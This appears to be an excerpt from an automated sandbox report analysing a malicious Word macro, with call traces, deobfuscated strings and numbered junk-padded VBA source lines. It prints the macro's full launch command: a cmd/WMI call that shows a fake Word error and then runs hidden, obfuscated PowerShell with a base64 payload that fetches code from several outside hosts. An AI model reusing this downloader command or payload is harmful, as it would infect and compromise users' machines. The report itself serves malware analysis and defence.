                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                                    CreateTextFile

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    FLtYjKHC

                                                    Close

                                                    qAUhkIMz

                                                    Create

                                                    		SWbemObjectEx.Create("cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArACcAdwAnACsAKAAnAFsAMwA6ACcAKwAnAC8ALwBzAGgAJwArACcAbwBwACcAKwAnAC4AJwApACsAJwBlAGwAJwArACcAZQAnACsAKAAnAG0AZQBuACcAKwAnAHMAbAAnACsAJwBpACcAKQArACgAJwBkACcAKwAnAGUALgAnACkAKwAoACcAYwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwAnACsAJwBuAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAvAC8AJwApACsAJwBrACcAKwAoACcAaAAnACsAJwBhAG4AJwApACsAKAAnAGgAJwArACcAaABvACcAKQArACgAJwBhAGgAbwAnACsAJwBtACcAKQArACgAJwBuAGEAeQAuAG4AZQAnACsAJwB0AC8AJwArACcAdwBvAHIAZABwACcAKQArACgAJwByAGUAJwArACcAcwAnACkAKwAoACcAcwAvACcAKwAnAEMAJwApACsAKAAnAEcATQBDAC8AQAAnACsAJwBdACcAKQArACcAYQBuACcAKwAnAHcAJwArACgAJwBbADMAOgAvACcAKwAnAC8AJwApACsAKAAnAGMAYQAnACsAJwBtACcAKQArACgAJwBwAHUAJwArACcAcwBlACcAKwAnAHgAcABvACcAKwAnAC4AbwByAGcALwBkAGUAJwApACsAJwBwACcAKwAoACcAYQByACcAKwAnAHQAbQBlAG4AJwApACsAJwB0ACcAKwAoACcALQAnACsAJwBvAGYALQBvAGQAaABtACcAKQArACgAJwBtAGsAZAAvADkANQBlAFgAJwArACcAWgAnACsAJwBZACcAKQArACgAJwAvAEAAXQBhAG4AdwBbACcAKwAnADMAcwA6AC8ALwBnACcAKwAnAHUAcgA,,) -> 0

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                                    V2enhc4htwl7z6bh

                                                    Thriap3q9rgf3yy9y

                                                    zZuzBZGD

                                                    CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                                    CreateTextFile

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    OIbfvEEFF

                                                    Close

                                                    eLmLDU

                                                    FYVZFEH

                                                    CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                                    CreateTextFile

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    hoyzuBGCP

                                                    Close

                                                    lADFBaJ

                                                    StringsDecrypted Strings
                                                    "Jsnt2t9fi0a8nnsiaf""Bete9x47doew46v"
                                                    "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                                    "OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC"
                                                    "VrVKCjefsIJ"
                                                    "sxbwAfRtWJI"
                                                    "WLXLJnjItPGPZJ"
                                                    "]anw[3""p]anw[3"
                                                    "]an""w[3ro]anw[3]a""nw[3ce]anw[3s]anw[3s]anw[3]anw[3"
                                                    "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                                    "YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF"
                                                    "ImJJdfAtdFHCh"
                                                    "deVdMyoREdgzCaJb"
                                                    "XZzpBRpDKuMgsGHIHF"
                                                    "]anw[3:w]anw[3]anw[3i""n]anw[33]anw[32]anw[3_]anw[3"
                                                    "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                                    "shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf"
                                                    "uTtCAFwHpCGF"
                                                    "lwWhZGEasjsS"
                                                    "MiCjaGqJfPrI"
                                                    "w]anw[3in]anw[3m]an""w[3gm]anw[3t]anw[3]anw[3"
                                                    "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                                    "HQGixyC:\vETCeBG\zIuEqsGG.NobmDA"
                                                    "dXFPCSYtSNB"
                                                    "KqVyuQQfwTWh"
                                                    "qDaYIDDSZQMTaO"
                                                    "]anw[3""]anw[3"
                                                    "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                                    "EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ"
                                                    "MxCpGaGqBgemCAFEJ"
                                                    "hbtzFRJEXyDCXI"
                                                    "zdTcdOoXXUFHJK"
                                                    "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                                    "RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo"
                                                    "hKlajOujwgDFAA"
                                                    "JMgUDAIEJlgyNBH"
                                                    "BUUJYAAIoJvLBLAo"
                                                    "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                                    "fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ"
                                                    "CVbRCAAhkhmcDG"
                                                    "XrrAwQZPjqB"
                                                    "fxSJajCGlWUEBW"
                                                    "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                                    "RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD"
                                                    "qiXBsMBsLJGbX"
                                                    "mehEFPFHcklgJDDx"
                                                    "BndJDkuVYF"
                                                    "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                                    "KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH"
                                                    "JTSPCDjykfL"
                                                    "bBmgOCvPPojGGC"
                                                    "anBQXljzGenE"
                                                    "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                                    "pGMMG:\enlVVB\fMqiFP.kEIECDZHz"
                                                    "dnUnKFHAkIOdD"
                                                    "ekluIEBJFIgoBcGC"
                                                    "BnxHFzJCGhVHrFIm"
                                                    "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                                    "rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW"
                                                    "fDdPHEjBEnAdZqZFJ"
                                                    "wypNISsWSXthFJCq"
                                                    "LvnHAGHfIhRDBRAF"
                                                    "]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
                                                    "HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA"
                                                    "DBvMcNtCcMyJDDI"
                                                    "eXpjHFapHaPdRJu"
                                                    "eXObOTlBAITEOIo"
                                                    LineInstructionMeta Information
                                                    2

                                                    Function G8xesq0b8jlsfrsp()

                                                    3

                                                    On Error Resume Next

                                                    executed
                                                    4

                                                    Dhubl2is48jort = "Jsnt2t9fi0a8nnsiaf" + "Bete9x47doew46v"

                                                    5

                                                    sf4 = Zw1k7hcmdl66 + A5gd21klfqu9c6rs.StoryRanges.Item(2 / 2) + Hyii7r76oq89

                                                    Zw1k7hcmdl66

                                                    Item

                                                    Hyii7r76oq89

                                                    6

                                                    Goto SblcDCC

                                                    7

                                                    Dim pULquU as Object

                                                    8

                                                    Set ibIiBF = diCXTi

                                                    diCXTi

                                                    9

                                                    Set pULquU = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                                    CreateObject

                                                    10

                                                    Dim SblcDCC as Object

                                                    11

                                                    Set SblcDCC = pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")

                                                    CreateTextFile

                                                    12

                                                    SblcDCC.WriteLine "VrVKCjefsIJ"

                                                    WriteLine

                                                    13

                                                    SblcDCC.WriteLine "sxbwAfRtWJI"

                                                    WriteLine

                                                    14

                                                    SblcDCC.WriteLine "WLXLJnjItPGPZJ"

                                                    WriteLine

                                                    15

                                                    Set jbUmDI = NZiApKAp

                                                    NZiApKAp

                                                    16

                                                    SblcDCC.Close

                                                    Close

                                                    17

                                                    Set pULquU = Nothing

                                                    18

                                                    Set MznOjBB = vrYYHIDxI

                                                    vrYYHIDxI

                                                    19

                                                    Set SblcDCC = Nothing

                                                    19

                                                    SblcDCC:

                                                    21

                                                    t3s = "]anw[3" + "p]anw[3"

                                                    22

                                                    K50yjh8o6l7s = "]an" + "w[3ro]anw[3]a" + "nw[3ce]anw[3s]anw[3s]anw[3]anw[3"

                                                    23

                                                    Goto fNhiCVgGS

                                                    24

                                                    Dim RyDBDK as Object

                                                    25

                                                    Set WTbkNqFa = gzTFLxb

                                                    gzTFLxb

                                                    26

                                                    Set RyDBDK = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                                    CreateObject

                                                    27

                                                    Dim fNhiCVgGS as Object

                                                    28

                                                    Set fNhiCVgGS = RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")

                                                    CreateTextFile

                                                    29

                                                    fNhiCVgGS.WriteLine "ImJJdfAtdFHCh"

                                                    WriteLine

                                                    30

                                                    fNhiCVgGS.WriteLine "deVdMyoREdgzCaJb"

                                                    WriteLine

                                                    31

                                                    fNhiCVgGS.WriteLine "XZzpBRpDKuMgsGHIHF"

                                                    WriteLine

                                                    32

                                                    Set OlapGi = PjNhJNA

                                                    PjNhJNA

                                                    33

                                                    fNhiCVgGS.Close

                                                    Close

                                                    34

                                                    Set RyDBDK = Nothing

                                                    35

                                                    Set yabVbA = oAaNlB

                                                    oAaNlB

                                                    36

                                                    Set fNhiCVgGS = Nothing

                                                    36

                                                    fNhiCVgGS:

                                                    38

                                                    Brlo236t2rmfu = "]anw[3:w]anw[3]anw[3i" + "n]anw[33]anw[32]anw[3_]anw[3"

                                                    39

                                                    Goto HCvCmAcHC

                                                    40

                                                    Dim iFTmFHFH as Object

                                                    41

                                                    Set UDSpFHqFJ = sySRJ

                                                    sySRJ

                                                    42

                                                    Set iFTmFHFH = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                                    CreateObject

                                                    43

                                                    Dim HCvCmAcHC as Object

                                                    44

                                                    Set HCvCmAcHC = iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")

                                                    CreateTextFile

                                                    45

                                                    HCvCmAcHC.WriteLine "uTtCAFwHpCGF"

                                                    WriteLine

                                                    46

                                                    HCvCmAcHC.WriteLine "lwWhZGEasjsS"

                                                    WriteLine

                                                    47

                                                    HCvCmAcHC.WriteLine "MiCjaGqJfPrI"

                                                    WriteLine

                                                    48

                                                    Set MmSDYCkJR = UwyYSBsBN

                                                    UwyYSBsBN

                                                    49

                                                    HCvCmAcHC.Close

                                                    Close

                                                    50

                                                    Set iFTmFHFH = Nothing

                                                    51

                                                    Set EISYDDB = tpOgXmm

                                                    tpOgXmm

                                                    52

                                                    Set HCvCmAcHC = Nothing

                                                    52

                                                    HCvCmAcHC:

                                                    54

                                                    Iogna_9cq5gv = "w]anw[3in]anw[3m]an" + "w[3gm]anw[3t]anw[3]anw[3"

                                                    55

                                                    Goto gEcrV

                                                    56

                                                    Dim RqlOZAHRJ as Object

                                                    57

                                                    Set jsYAGBJAF = MHYlQAD

                                                    MHYlQAD

                                                    58

                                                    Set RqlOZAHRJ = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))

                                                    CreateObject

                                                    59

                                                    Dim gEcrV as Object

                                                    60

                                                    Set gEcrV = RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")

                                                    CreateTextFile

